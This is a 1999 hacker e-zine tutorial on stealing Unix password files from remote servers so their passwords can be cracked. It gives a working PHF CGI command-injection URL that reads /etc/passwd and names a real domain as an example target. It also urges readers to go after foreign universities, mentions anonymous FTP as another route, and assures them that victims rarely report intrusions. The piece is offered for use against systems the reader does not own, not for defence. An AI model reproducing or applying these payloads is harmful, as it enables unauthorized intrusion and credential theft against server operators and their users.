SWAT MAGAZINE ISSUE FOURTEEN: FEBRUARY 1999 ============================================ Getting The Password File ============================================ Author : Netw0rk Bug E-Mail : bug@netw0rk.freeserve.co.uk Date : February 1998 ============================================ I get asked how to get the passwd file all the time. So I decided to write up this little file which will help teach some of the newbies the basics. You should all by now know how to crack a passwd file. If not then go ahead and download the tutorial from my site. What we need to learn now is ways of getting the passwd file of the server that you wan't to hack. The passwd file is nearly always in /etc/passwd There are a few diffrent ways to get a password file. You can: a.) PHF exploit b.) Telnet to port 21 on the provider. When using TELNET type: User anonymous login c.) Use an FTP program that does all the commands for you. What we are going to do is take a look at the PHF Exploit. First let me explain what an exploit is. An Exploit is a hole in software that allows someone to get something out of it that... Well you aren't supposed to. The PHF exploit is a hole in CGI, that most servers have fixed now (if they have CGI). Lets just say a very popular IRC place has a problem with their CGI. Also on the subject of servers with the exploit open, many forien servers have this open. Unlike the FTP Passwd you don't even have to access their FTP or login. What you do is get a WWW browser and then in the place for the WWW address type: http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd In www.target.com Place who's passwd you want to get. So if you were going to try cyberspace.org you would put: http://cyberspace.org/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd If you get a message like "The requested object does not exist on this server. The link you followed is either outdated, inaccurate,mor the server has been instructed not to let you have it." its not there. If you get "You have been caught on Candid Camera!" They caught you, but don't fear they rarly ever Report you. I have yet to find a server that does report. Of course if you get "root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh" then you have hit the jackpot. This is by far the easiest method of getting the passwd file. It usually works best on foreign universitys. Search for some in a search engine. cya later